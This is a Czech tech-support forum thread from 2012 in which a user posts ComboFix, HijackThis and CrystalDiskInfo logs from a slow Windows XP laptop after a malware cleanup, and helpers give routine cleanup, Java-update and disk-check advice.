IE: {{77F665FD-3F60-4B0A-AE14-EC124B7A7FCE} - c:\program files\ICQ7.7\ICQ.exe
Trusted Zone: postovnisporitelna.cz\maxibps
TCP: DhcpNameServer = 192.168.1.1
TCP: Interfaces\{E5EB13B7-6964-469C-B595-E27F5E8665C5}: NameServer = 10.107.4.100,10.107.4.129
DPF: {672EE252-D813-4F5E-81BB-5DD163DD4FA5} - hxxps://www.mojedatovaschranka.cz/stati ... ctivex.cab
.
.
**************************************************************************
.
catchme 0.3.1398 W2K/XP/Vista - rootkit/stealth malware detector by Gmer, http://www.gmer.net
Rootkit scan 2012-08-30 12:14
Windows 5.1.2600 Service Pack 3 NTFS
.
skenování skrytých procesů ...
.
skenování skrytých položek 'Po spuštění' ...
.
skenování skrytých souborů ...
.
sken byl úspešně dokončen
skryté soubory: 0
.
**************************************************************************
.
--------------------- ZAMKNUTÉ KLÍČE V REGISTRU ---------------------
.
[HKEY_USERS\S-1-5-21-1871938407-2727508527-3954083314-1008\Software\Microsoft\SystemCertificates\AddressBook*]
@Allowed: (Read) (RestrictedCode)
@Allowed: (Read) (RestrictedCode)
.
--------------------- Knihovny navázané na běžící procesy ---------------------
.
- - - - - - - > 'explorer.exe'(3996)
c:\progra~1\WINDOW~2\wmpband.dll
c:\windows\system32\webcheck.dll
c:\windows\system32\WPDShServiceObj.dll
c:\windows\system32\PortableDeviceTypes.dll
c:\windows\system32\PortableDeviceApi.dll
.
------------------------ Jiné spuštené procesy ------------------------
.
c:\program files\Avira\AntiVir Desktop\avguard.exe
c:\program files\Intel\Intel Matrix Storage Manager\Iaantmon.exe
c:\program files\Java\jre6\bin\jqs.exe
c:\program files\Common Files\LightScribe\LSSrvc.exe
c:\program files\CyberLink\Shared Files\RichVideo.exe
c:\program files\Avira\AntiVir Desktop\avshadow.exe
c:\program files\Evernote\Evernote\EvernoteClipper.exe
c:\windows\system32\wbem\unsecapp.exe
c:\windows\system32\wbem\wmiapsrv.exe
.
**************************************************************************
.
Celkový čas: 2012-08-30 12:19:46 - počítač byl restartován
ComboFix-quarantined-files.txt 2012-08-30 10:19
ComboFix2.txt 2012-08-28 21:22
ComboFix3.txt 2012-08-28 04:26
.
Před spuštěním: 2 602 283 008
Po spuštění: 2 498 478 080
.
- - End Of File - - 761A5075AB005CA4803810FFFB2AECF6

Příspěvekod **memphisto** » 30 srp 2012 12:36

Mělo by být volno něco kolem 10 % kapacity disku.

ComboFix se odinstaluje takto:
Start-Spustit a zadej ComboFix /Uninstall

vyčisti systém CCleanerem

a použij i T-Cleaner
smaže vše po Combu,MWAVu atd.-stáhneš>spustíš

pozn. před stažením T-Cleaneru a po dobu čištění deaktivuj AVG , Avast,Avira či Microsoft Security Essentials následně T-Cleaner smaž a zapni si AVG , Avast, Avira či Microsoft Security Essentials

+ Nový log z HJT

Jak se chová PC?

yeewf7 · Příspěvekod **yeewf7** » 04 zář 2012 21:39

ok, tak ted je tam 9GB mista....(z 34GB na C

) pc jede rozhodne rychleji, start do 2 min (nez ten starik prestane rachotit s hdd..), ale to načítání stránek je snad horší než před tím, otevreni prohlizece a nacteni prvni stranky (seznam) trvá někdy i dyl jak 3minuty... pak hlavne prihlasovani někam trva věčnost. co s tim (chrom a Ie, IE je mozna aj rychlejsi, jak to)
Takže žádny zmetci tam už nejsou ?..

Logfile of Trend Micro HijackThis v2.0.4
Scan saved at 21:39:02, on 4.9.2012
Platform: Windows XP SP3 (WinNT 5.01.2600)
MSIE: Internet Explorer v8.00 (8.00.6001.18702)
Boot mode: Normal

Running processes:
C:\WINDOWS\System32\smss.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\lsass.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\System32\svchost.exe
C:\WINDOWS\System32\svchost.exe
C:\WINDOWS\system32\spoolsv.exe
C:\Program Files\Avira\AntiVir Desktop\sched.exe
C:\Program Files\Common Files\soft602\602updsvc\602updsvc.exe
C:\Program Files\Avira\AntiVir Desktop\avguard.exe
C:\Program Files\Intel\Intel Matrix Storage Manager\Iaantmon.exe
C:\Program Files\Java\jre6\bin\jqs.exe
C:\Program Files\Common Files\LightScribe\LSSrvc.exe
C:\Program Files\CyberLink\Shared Files\RichVideo.exe
C:\WINDOWS\system32\svchost.exe
C:\Program Files\Avira\AntiVir Desktop\avshadow.exe
C:\WINDOWS\Explorer.EXE
C:\Acer\Empowering Technology\ePower\ePower_DMC.exe
C:\Program Files\Avira\AntiVir Desktop\avgnt.exe
C:\Program Files\NewTech Infosystems\NTI Shadow\Shadow.exe
C:\Program Files\Google\GoogleToolbarNotifier\GoogleToolbarNotifier.exe
C:\WINDOWS\system32\ctfmon.exe
C:\Acer\Empowering Technology\Acer.Empowering.Framework.Launcher.exe
C:\Program Files\Evernote\Evernote\EvernoteClipper.exe
C:\WINDOWS\system32\wbem\unsecapp.exe
C:\WINDOWS\system32\wbem\wmiapsrv.exe
C:\Program Files\Stickies\stickies.exe
C:\Program Files\Google\Chrome\Application\chrome.exe
C:\Program Files\Google\Chrome\Application\chrome.exe
C:\Program Files\Google\Chrome\Application\chrome.exe
C:\Program Files\Google\Chrome\Application\chrome.exe
C:\Program Files\Google\Chrome\Application\chrome.exe
C:\Program Files\Google\Chrome\Application\chrome.exe
C:\Program Files\Google\Chrome\Application\chrome.exe
C:\Program Files\Google\Chrome\Application\chrome.exe
C:\Program Files\Google\Chrome\Application\chrome.exe
C:\Program Files\Google\Chrome\Application\chrome.exe
C:\Program Files\Google\Chrome\Application\chrome.exe
C:\Documents and Settings\Ester\Plocha\HijackThis.exe

R0 - HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = http://go.microsoft.com/fwlink/?LinkId=69157
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = http://go.microsoft.com/fwlink/?LinkId=69157
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = http://go.microsoft.com/fwlink/?LinkId=54896
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = http://go.microsoft.com/fwlink/?LinkId=54896
R0 - HKCU\Software\Microsoft\Internet Explorer\Toolbar,LinksFolderName = Odkazy
O2 - BHO: Java(tm) Plug-In SSV Helper - {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} - C:\Program Files\Java\jre6\bin\ssv.dll
O2 - BHO: Google Toolbar Helper - {AA58ED58-01DD-4d91-8333-CF10577473F7} - C:\Program Files\Google\Google Toolbar\GoogleToolbar_32.dll
O2 - BHO: Google Toolbar Notifier BHO - {AF69DE43-7D58-4638-B6FA-CE66B5AD205D} - C:\Program Files\Google\GoogleToolbarNotifier\5.7.7529.1424\swg.dll
O2 - BHO: Java(tm) Plug-In 2 SSV Helper - {DBC80044-A445-435b-BC74-9C25C1C588A9} - C:\Program Files\Java\jre6\bin\jp2ssv.dll
O2 - BHO: JQSIEStartDetectorImpl - {E7E6F031-17CE-4C07-BC86-EABFE594F69C} - C:\Program Files\Java\jre6\lib\deploy\jqs\ie\jqs_plugin.dll
O3 - Toolbar: Google Toolbar - {2318C2B1-4965-11d4-9B18-009027A5CD4F} - C:\Program Files\Google\Google Toolbar\GoogleToolbar_32.dll
O4 - HKLM\..\Run: [ePower_DMC] C:\Acer\Empowering Technology\ePower\ePower_DMC.exe
O4 - HKLM\..\Run: [Boot] C:\Acer\Empowering Technology\ePower\Boot.exe
O4 - HKLM\..\Run: [avgnt] "C:\Program Files\Avira\AntiVir Desktop\avgnt.exe" /min
O4 - HKCU\..\Run: [Shadow] C:\Program Files\NewTech Infosystems\NTI Shadow\Shadow.exe --minimize
O4 - HKCU\..\Run: [swg] "C:\Program Files\Google\GoogleToolbarNotifier\GoogleToolbarNotifier.exe"
O4 - HKCU\..\Run: [ctfmon.exe] C:\WINDOWS\system32\ctfmon.exe
O4 - HKUS\S-1-5-18\..\Run: [CTFMON.EXE] C:\WINDOWS\system32\CTFMON.EXE (User 'SYSTEM')
O4 - HKUS\S-1-5-18\..\Run: [DWQueuedReporting] "C:\PROGRA~1\COMMON~1\MICROS~1\DW\dwtrig20.exe" -t (User 'SYSTEM')
O4 - HKUS\.DEFAULT\..\Run: [CTFMON.EXE] C:\WINDOWS\system32\CTFMON.EXE (User 'Default user')
O4 - Startup: Stickies.lnk = C:\Program Files\Stickies\stickies.exe
O4 - Global Startup: Acer Empowering Technology.lnk = ?
O4 - Global Startup: Evernote Clipper.lnk = ?
O8 - Extra context menu item: Add to Evernote 4.0 - res://C:\Program Files\Evernote\Evernote\EvernoteIE.dll/204
O8 - Extra context menu item: E&xportovat do aplikace Microsoft Excel - res://C:\PROGRA~1\MICROS~2\Office12\EXCEL.EXE/3000
O9 - Extra button: ICQ7.7 - {77F665FD-3F60-4B0A-AE14-EC124B7A7FCE} - C:\Program Files\ICQ7.7\ICQ.exe
O9 - Extra 'Tools' menuitem: ICQ7.7 - {77F665FD-3F60-4B0A-AE14-EC124B7A7FCE} - C:\Program Files\ICQ7.7\ICQ.exe
O9 - Extra button: @C:\Program Files\Evernote\Evernote\Resource.dll,-101 - {A95fe080-8f5d-11d2-a20b-00aa003c157a} - res://C:\Program Files\Evernote\Evernote\EvernoteIE.dll/204 (file missing)
O9 - Extra 'Tools' menuitem: @C:\Program Files\Evernote\Evernote\Resource.dll,-101 - {A95fe080-8f5d-11d2-a20b-00aa003c157a} - res://C:\Program Files\Evernote\Evernote\EvernoteIE.dll/204 (file missing)
O9 - Extra button: (no name) - {e2e2dd38-d088-4134-82b7-f2ba38496583} - C:\WINDOWS\Network Diagnostic\xpnetdiag.exe
O9 - Extra 'Tools' menuitem: @xpsp3res.dll,-20001 - {e2e2dd38-d088-4134-82b7-f2ba38496583} - C:\WINDOWS\Network Diagnostic\xpnetdiag.exe
O9 - Extra button: Messenger - {FB5F1910-F110-11d2-BB9E-00C04F795683} - C:\Program Files\Messenger\msmsgs.exe
O9 - Extra 'Tools' menuitem: Windows Messenger - {FB5F1910-F110-11d2-BB9E-00C04F795683} - C:\Program Files\Messenger\msmsgs.exe
O10 - Unknown file in Winsock LSP: c:\windows\system32\nwprovau.dll
O16 - DPF: {672EE252-D813-4F5E-81BB-5DD163DD4FA5} (Active602XMLFiller Control) - https://www.mojedatovaschranka.cz/stati ... ctivex.cab
O16 - DPF: {6E32070A-766D-4EE6-879C-DC1FA91D2FC3} (MUWebControl Class) - http://www.update.microsoft.com/microso ... 7808216734
O17 - HKLM\System\CCS\Services\Tcpip\..\{E5EB13B7-6964-469C-B595-E27F5E8665C5}: NameServer = 10.107.4.100,10.107.4.129
O18 - Protocol: skype4com - {FFC8B962-9B40-4DFF-9458-1830C7DD7F5D} - C:\PROGRA~1\COMMON~1\Skype\SKYPE4~1.DLL
O22 - SharedTaskScheduler: Browseui preloader - {438755C2-A8BA-11D1-B96B-00A0C90312E1} - C:\WINDOWS\system32\browseui.dll
O22 - SharedTaskScheduler: Proces mezipaměti kategorií součástí - {8C7461EF-2B13-11d2-BE35-3078302C2030} - C:\WINDOWS\system32\browseui.dll
O23 - Service: 602Updater (602XML Updater) - Software602 a.s. - C:\Program Files\Common Files\soft602\602updsvc\602updsvc.exe
O23 - Service: Adobe Flash Player Update Service (AdobeFlashPlayerUpdateSvc) - Adobe Systems Incorporated - C:\WINDOWS\system32\Macromed\Flash\FlashPlayerUpdateService.exe
O23 - Service: Avira Scheduler (AntiVirSchedulerService) - Avira Operations GmbH & Co. KG - C:\Program Files\Avira\AntiVir Desktop\sched.exe
O23 - Service: Avira Realtime Protection (AntiVirService) - Avira Operations GmbH & Co. KG - C:\Program Files\Avira\AntiVir Desktop\avguard.exe
O23 - Service: Google Software Updater (gusvc) - Google - C:\Program Files\Google\Common\Google Updater\GoogleUpdaterService.exe
O23 - Service: Intel(R) Matrix Storage Event Monitor (IAANTMON) - Intel Corporation - C:\Program Files\Intel\Intel Matrix Storage Manager\Iaantmon.exe
O23 - Service: InstallDriver Table Manager (IDriverT) - Macrovision Corporation - C:\Program Files\Common Files\InstallShield\Driver\1150\Intel 32\IDriverT.exe
O23 - Service: Java Quick Starter (JavaQuickStarterService) - Sun Microsystems, Inc. - C:\Program Files\Java\jre6\bin\jqs.exe
O23 - Service: LightScribeService Direct Disc Labeling Service (LightScribeService) - Hewlett-Packard Company - C:\Program Files\Common Files\LightScribe\LSSrvc.exe
O23 - Service: Cyberlink RichVideo Service(CRVS) (RichVideo) - Unknown owner - C:\Program Files\CyberLink\Shared Files\RichVideo.exe

--
End of file - 8177 bytes

Příspěvekod **jaro3** » 05 zář 2012 10:17

Eset online scanner:(16.7.2012)
C:\mine.exe a variant of Win32/BitCoinMiner.A application
C:\WINDOWS\temp\winrar.exe a variant of Win32/BitCoinMiner.A application
C:\WINDOWS\temp\winsoft.exe a variant of Win32/Kryptik.AIEV trojan
Právěže mě zmátlo, že ty soubory jsou viry, ale byly dokonce i podepsany vydavatelem (Ufasoft), ale nevim jak se sem ten program dostal, proto mě zajímalo o co jde. No ted uz trochu vim co ten bit coin je http://bitcoins.sk/media, tak mam právě takový tušení, že si asi někdo udělal botnet sit pocitaců, propašuje jim tam tenhle program a pak na nich vydělává ty bitcoiny, aniž by to tom oni věděli... Asi jo co?

digitální podpis už se dá běžně zfalšovat.

aha, systemovej disk, to je C:\ ? kolik mista by tam melo byt? je tam neco pres 2 GB. takze musim neco odinstalovat?

potřebuješ 15% volného místa pro windows.

ok, tak ted je tam 9GB mista....(z 34GB na C ) pc jede rozhodne rychleji, start do 2 min (nez ten starik prestane rachotit s hdd..), ale to načítání stránek je snad horší než před tím, otevreni prohlizece a nacteni prvni stranky (seznam) trvá někdy i dyl jak 3minuty... pak hlavne prihlasovani někam trva věčnost. co s tim (chrom a Ie, IE je mozna aj rychlejsi, jak to)
Takže žádny zmetci tam už nejsou ?..

To by mělo stačit. Zkus ještě:
Vypni body obnovy---restartuj---po restartu si zase zapni body obnovy.

Aktualizuj javu:
Java SE Runtime Environment 7

Klikni na Accept License Agreement
Vyber si OS (Windows nebo Windows x64, Offline Installation)
jre-7-windows-i586-p.exe nebo
jre-7-windows-x64.exe
Stáhni ( download) a nainstaluj.
Ostatní javy odeber v přidat/odebrat programy.

Stáhni si Memtest:

Do políčka vlož největší velikost Tvé jednotlivé paměti RAM (256,512 nebo 1024,2048) dej Start , nech nejméně 2h běžet , pokud bude po 2h stále 0 errors , jsou v pořádku.

Je třeba zkontrolovat HDD na chyby , zkusit jeho defragmentaci ..

Stáhni si CrystalDiskInfo
Spusť program a klikni na Úpravy-Kopírovat. Poté sem vlož pomocí Ctrl+V obsah logu.

yeewf7 · Příspěvekod **yeewf7** » 10 zář 2012 20:47

Ok, tak všechno co jsi psal jsem udelala krom memtestu, ten hodim jeste rano...az pudu spat....
Ale vypada to spis, ze pc je ok asi ze jo, asi to bude nak tim pripojenim nebo siti. O vejkendu jsem se napichla do ine site a slo to celkem normalne (naka dlink 18Mb/s). Pak doma zas pomalu, a domaci rikala, ze ji to taky jede v posledni dobe nak zpomalene... (a je tady rychlost 11 Mb/s a driv bylo 48, vecer aj 64...tak nevim poroc ted ne...a nebo nas bere ten provozovatel na hul a nebo neni neco s tim routerem?) ..

----------------------------------------------------------------------------
CrystalDiskInfo 5.0.4 (C) 2008-2012 hiyohiyo
Crystal Dew World : http://crystalmark.info/
----------------------------------------------------------------------------

OS : Windows XP Professional SP3 [5.1 Build 2600] (x86)
Date : 2012/09/10 20:32:44

-- Controller Map ----------------------------------------------------------
+ Intel(R) ICH8M Ultra ATA Storage Controllers - 2850 [ATA]
+ Primární kanál IDE (0)
- HL-DT-ST DVDRAM GSA-T20N
- Sekundární kanál IDE (1)
+ Intel(R) 82801HEM/HBM SATA AHCI Controller [ATA]
- Hitachi HTS541680J9SA00

-- Disk List ---------------------------------------------------------------
(1) Hitachi HTS541680J9SA00 : 80,0 GB [0/1/0, pd1]
(2) TOSHIBA MK7559GSXP : 750,1 GB [1/X/X, sa1] (V=125F, P=A93A)

----------------------------------------------------------------------------
(1) Hitachi HTS541680J9SA00
----------------------------------------------------------------------------
Model : Hitachi HTS541680J9SA00
Firmware : SB2OC70P
Serial Number : SB2241KGE60BUE
Disk Size : 80,0 GB (8,4/80,0/80,0)
Buffer Size : 7516 KB
Queue Depth : 32
# of Sectors : 156301488
Rotation Rate : Neznámy údaj
Interface : Serial ATA
Major Version : ATA/ATAPI-7
Minor Version : ATA/ATAPI-7 T13 1532D version 1
Transfer Mode : SATA/150
Power On Hours : 17261 hod.
Power On Count : 2951 krát
Temparature : 44 C (111 F)
Health Status : Dobrý
Features : S.M.A.R.T., APM, AAM, 48bit LBA, NCQ
APM Level : 4080h [ON]
AAM Level : 80FEh [OFF]

-- S.M.A.R.T. --------------------------------------------------------------
ID Cur Wor Thr RawValues(6) Attribute Name
01 100 100 _62 000000000000 Počet chyb čtení
02 100 100 _40 000000000000 Průchodnost disku
03 253 253 _33 000800000000 Čas na roztočení ploten
04 _99 _99 __0 000000000C0D Počet spuštění/zastavení
05 100 100 __5 000000000000 Počet přemapovaných sektorů
07 100 100 _67 000000000000 Počet chybných hledání
08 100 100 _40 000000000000 Čas potřebný na vyhledání
09 _61 _61 __0 00000000436D Hodin v činnosti
0A 100 100 _60 000000000000 Počet opakovaných pokusů o roztočení ploten
0C _99 _99 __0 000000000B87 Počet cyklů zapnutí zařízení
BF 100 100 __0 000000000000 Počet udalostí zaznamenaných otřesovým senzorem
C0 100 100 __0 000000000037 Počet vypnutí disku
C1 _73 _73 __0 000000044267 Počet cyklů načítání/vymazání
C2 125 125 __0 0035000E002C Teplota
C4 100 100 __0 000000000000 Počet udalostí s číslem realokování sektorů
C5 100 100 __0 000000000000 Počet podezřelých sektorů
C6 100 100 __0 000000000000 Počet neopravitelných sektorů
C7 200 253 __0 000000000000 Počet chyb v kontrolním součtu UltraDMA
DF 100 100 __0 000000000000 Zatížení budiče magnetických hlav způsobené opakovanými úkony

-- IDENTIFY_DEVICE ---------------------------------------------------------
0 1 2 3 4 5 6 7 8 9
000: 045A 3FFF C837 0010 0000 0000 003F 0000 0000 0000
010: 2020 2020 2020 5342 3232 3431 4B47 4536 3042 5545
020: 0003 3AB8 0004 5342 324F 4337 3050 4869 7461 6368
030: 6920 4854 5335 3431 3638 304A 3953 4130 3020 2020
040: 2020 2020 2020 2020 2020 2020 2020 8010 0000 0F00
050: 4000 0200 0200 0007 3FFF 0010 003F FC10 00FB 0110
060: F8B0 0950 0000 0007 0003 0078 0078 0078 0078 0000
070: 0000 0000 0000 0000 0000 001F 0702 0000 005E 004C
080: 00FC 001A 746B 7F69 6163 7469 3C49 6163 203F 0015
090: 0000 4080 FFFE 0000 80FE 0000 0000 0000 0000 0000
100: F8B0 0950 0000 0000 0000 0000 0000 8848 5000 CCA5
110: 51DE EAAA 0000 0000 0000 0000 0000 0000 0000 4000
120: 4000 0000 0000 0000 0000 0000 0000 0000 0009 000B
130: 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000
140: 0000 0000 0000 0000 0000 0000 0000 0000 4001 0000
150: 8000 0000 324A 0000 0000 4251 0000 0000 0000 0000
160: 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000
170: 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000
180: 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000
190: 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000
200: 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000
210: 0000 0000 8000 0000 0000 0000 0000 0000 0000 0000
220: 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000
230: 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000
240: 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000
250: 0000 0000 0000 0000 0000 9EA5

-- SMART_READ_DATA ---------------------------------------------------------
+0 +1 +2 +3 +4 +5 +6 +7 +8 +9 +A +B +C +D +E +F
000: 10 00 01 0B 00 64 64 00 00 00 00 00 00 00 02 05
010: 00 64 64 00 00 00 00 00 00 00 03 07 00 FD FD 00
020: 00 00 00 08 00 00 04 12 00 63 63 0D 0C 00 00 00
030: 00 00 05 33 00 64 64 00 00 00 00 00 00 00 07 0B
040: 00 64 64 00 00 00 00 00 00 00 08 05 00 64 64 00
050: 00 00 00 00 00 00 09 12 00 3D 3D 6D 43 00 00 00
060: 00 00 0A 13 00 64 64 00 00 00 00 00 00 00 0C 32
070: 00 63 63 87 0B 00 00 00 00 00 BF 0A 00 64 64 00
080: 00 00 00 00 00 00 C0 32 00 64 64 37 00 00 00 00
090: 00 00 C1 12 00 49 49 67 42 04 00 00 00 00 C2 02
0A0: 00 7D 7D 2C 00 0E 00 35 00 00 C4 32 00 64 64 00
0B0: 00 00 00 00 00 00 C5 22 00 64 64 00 00 00 00 00
0C0: 00 00 C6 08 00 64 64 00 00 00 00 00 00 00 C7 0A
0D0: 00 C8 FD 00 00 00 00 00 00 00 DF 0A 00 64 64 00
0E0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0F0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
100: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
110: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
120: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
130: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
140: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
150: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
160: 00 00 00 00 00 00 00 00 00 00 00 00 85 02 01 5B
170: 03 00 01 00 02 2C 00 00 00 00 00 00 00 00 00 00
180: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
190: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
1A0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
1B0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
1C0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
1D0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
1E0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
1F0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 BD

-- SMART_READ_THRESHOLD ----------------------------------------------------
+0 +1 +2 +3 +4 +5 +6 +7 +8 +9 +A +B +C +D +E +F
000: 10 00 01 3E 00 00 00 00 00 00 00 00 00 00 02 28
010: 00 00 00 00 00 00 00 00 00 00 03 21 00 00 00 00
020: 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 00
030: 00 00 05 05 00 00 00 00 00 00 00 00 00 00 07 43
040: 00 00 00 00 00 00 00 00 00 00 08 28 00 00 00 00
050: 00 00 00 00 00 00 09 00 00 00 00 00 00 00 00 00
060: 00 00 0A 3C 00 00 00 00 00 00 00 00 00 00 0C 00
070: 00 00 00 00 00 00 00 00 00 00 BF 00 00 00 00 00
080: 00 00 00 00 00 00 C0 00 00 00 00 00 00 00 00 00
090: 00 00 C1 00 00 00 00 00 00 00 00 00 00 00 C2 00
0A0: 00 00 00 00 00 00 00 00 00 00 C4 00 00 00 00 00
0B0: 00 00 00 00 00 00 C5 00 00 00 00 00 00 00 00 00
0C0: 00 00 C6 00 00 00 00 00 00 00 00 00 00 00 C7 00
0D0: 00 00 00 00 00 00 00 00 00 00 DF 00 00 00 00 00
0E0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0F0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
100: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
110: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
120: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
130: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
140: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
150: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
160: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
170: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
180: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
190: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
1A0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
1B0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
1C0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
1D0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
1E0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
1F0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 89

----------------------------------------------------------------------------
(2) TOSHIBA MK7559GSXP
----------------------------------------------------------------------------
Enclosure : ADATA HDD SH93 USB Device (V=125F, P=A93A, sa1)
Model : TOSHIBA MK7559GSXP
Firmware : GN001U
Serial Number : X0PQD0G3B
Disk Size : 750,1 GB (8,4/137,4/750,1)
Buffer Size : 8192 KB
Queue Depth : 32
# of Sectors : 1465149168
Rotation Rate : 5400 RPM
Interface : USB (Serial ATA)
Major Version : ATA8-ACS
Minor Version : ----
Transfer Mode : SATA/300
Power On Hours : 1111 hod.
Power On Count : 466 krát
Temparature : 28 C (82 F)
Health Status : Dobrý
Features : S.M.A.R.T., APM, 48bit LBA, NCQ
APM Level : 0080h [ON]
AAM Level : ----

-- S.M.A.R.T. --------------------------------------------------------------
ID Cur Wor Thr RawValues(6) Attribute Name
01 100 100 _50 000000000000 Počet chyb čtení
02 100 100 _50 000000000000 Průchodnost disku
03 100 100 __1 000000000BA2 Čas na roztočení ploten
04 100 100 __0 0000000007CC Počet spuštění/zastavení
05 100 100 _50 000000000000 Počet přemapovaných sektorů
07 100 100 _50 000000000000 Počet chybných hledání
08 100 100 _50 000000000000 Čas potřebný na vyhledání
09 _98 _98 __0 000000000457 Hodin v činnosti
0A 138 100 _30 000000000000 Počet opakovaných pokusů o roztočení ploten
0C 100 100 __0 0000000001D2 Počet cyklů zapnutí zařízení
BF 100 100 __0 000000000000 Počet udalostí zaznamenaných otřesovým senzorem
C0 100 100 __0 000000000002 Počet vypnutí disku
C1 100 100 __0 000000000FC6 Počet cyklů načítání/vymazání
C2 100 100 __0 002D0011001C Teplota
C4 100 100 __0 000000000000 Počet udalostí s číslem realokování sektorů
C5 100 100 __0 000000000000 Počet podezřelých sektorů
C6 100 100 __0 000000000000 Počet neopravitelných sektorů
C7 200 200 __0 000000000000 Počet chyb v kontrolním součtu UltraDMA
DC 100 100 __0 000000001023 Posunutí disku vůči ose
DE 100 100 __0 000000000026 Počet hodin zalažení budoucího mechanismu magnetických hlav
DF 100 100 __0 000000000000 Zatížení budiče magnetických hlav způsobené opakovanými úkony
E0 100 100 __0 000000000000 Zatížení budiče magnetických hlav způsobené napětím mechanických částí
E2 100 100 __0 00000000011E Celkový čas zatížení budiče magnetických hlav
F0 100 100 __1 000000000000 Čas nastavování hlaviček - v hodinách

-- IDENTIFY_DEVICE ---------------------------------------------------------
0 1 2 3 4 5 6 7 8 9
000: 0040 3FFF C837 0010 0000 0000 003F 0000 0000 0000
010: 2020 2020 2020 2020 2020 2058 3050 5144 3047 3342
020: 0000 4000 0000 474E 3030 3155 2020 544F 5348 4942
030: 4120 4D4B 3735 3539 4753 5850 2020 2020 2020 2020
040: 2020 2020 2020 2020 2020 2020 2020 8010 0000 2F00
050: 4000 0200 0000 0007 3FFF 0010 003F FC10 00FB 0110
060: FFFF 0FFF 0007 0007 0003 0078 0078 0078 0078 0000
070: 0000 0000 0000 0000 0000 001F 0F06 0002 004C 0040
080: 01F8 0000 746B 7D09 6163 7469 BC09 6163 203F 005C
090: 005C 0080 FFFE 0000 0000 0000 0000 0000 0000 0000
100: 66F0 5754 0000 0000 0000 0000 6003 0000 5000 0392
110: DB20 6FDE 0000 0000 0000 0000 0000 0000 0000 4018
120: 4018 0000 0000 0000 0000 0000 0000 0000 0021 0000
130: 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000
140: 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000
150: 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000
160: 0000 0000 0000 0000 0000 0000 0000 0000 0003 0000
170: 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000
180: 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000
190: 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000
200: 0000 0000 0000 0000 0000 0000 003D 0000 0000 0000
210: 0000 0000 0000 0000 0000 0000 0000 1518 0000 0000
220: 0000 0000 101F 0000 0000 0000 0000 0000 0000 0000
230: 0000 0000 0000 0000 0001 0080 0000 0000 0000 0000
240: 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000
250: 0000 0000 0000 0000 0000 36A5

-- SMART_READ_DATA ---------------------------------------------------------
+0 +1 +2 +3 +4 +5 +6 +7 +8 +9 +A +B +C +D +E +F
000: 10 00 01 0B 00 64 64 00 00 00 00 00 00 00 02 05
010: 00 64 64 00 00 00 00 00 00 00 03 27 00 64 64 A2
020: 0B 00 00 00 00 00 04 32 00 64 64 CC 07 00 00 00
030: 00 00 05 33 00 64 64 00 00 00 00 00 00 00 07 0B
040: 00 64 64 00 00 00 00 00 00 00 08 05 00 64 64 00
050: 00 00 00 00 00 00 09 32 00 62 62 57 04 00 00 00
060: 00 00 0A 33 00 8A 64 00 00 00 00 00 00 00 0C 32
070: 00 64 64 D2 01 00 00 00 00 00 BF 32 00 64 64 00
080: 00 00 00 00 00 00 C0 32 00 64 64 02 00 00 00 00
090: 00 00 C1 32 00 64 64 C6 0F 00 00 00 00 00 C2 22
0A0: 00 64 64 1C 00 11 00 2D 00 00 C4 32 00 64 64 00
